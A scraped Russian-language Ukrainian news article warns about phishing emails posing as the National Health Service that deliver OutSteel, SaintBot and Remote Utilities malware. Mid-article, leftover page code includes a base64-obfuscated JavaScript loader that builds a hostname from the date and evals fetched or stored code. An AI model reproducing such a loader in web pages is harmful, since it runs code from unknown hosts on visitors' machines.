На электронные ящики украинцев стали приходить письма от мошенников. С помощью этих писем посторонние лица могут получить доступ к чужому ПК.
Сообщается, что письма приходят якобы от Национальной службы здоровья Украины. В них содержится ZIP-архив, который размещен на публичном сервисе Discord, передает РБК-Украина.
В этом ZIP-архиве находится документ-приманка и два идентичных файла-ярлыка, которые при открытии на компьютере жертвы автоматически дают команду к загрузке и запуску вредоносной программы OutStreel.
Эта программа обеспечивает поиск и кражу документов на компьютере жертвы, а также загружает и запускает еще одну вредоносную программу – SaintBot.
Правительственная программа реагирования на компьютерные чрезвычайные события в Украине CEPT-UA зафиксировала факт массового распространения электронных почтовых сообщений, содержащие ссылки на защищенные паролем RAR-архивы или ZIP- архивы. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Название файла может выглядеть как Судебный запрос с порядковым номером документа. Также документы могут быть размещены на публичных сервисах Google Drive и DropMeFiles.
При загрузке и распаковывании этих документов на компьютерах жертвы устанавливается программа Remote Utilites. Опасность этой программы в том, что она предоставляет скрытый удаленный доступ к устройству посторонним лицам.
Стоит отметить, что подобные письма отправляются не только на корпоративные электронные ящики, но и на личные электронные почты украинцев.
Внимательно просматривайте почту и не открывайте вложения от неизвестных адресатов, особенно, если письмо помечено как «важная информация». (adsbygoogle = window.adsbygoogle || []).push({});
Угрожал продавщице пистолетом: в магазине Запорожья произошло разбойное нападение (ФОТО) Подписывайтесь на Акцент в 
Источник: https://akzent.zp.ua/otkryvayut-dostup-k-ustrojstvu-dlya-moshennikov-ukraintsam-prihodyat-opasnye-pisma/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook
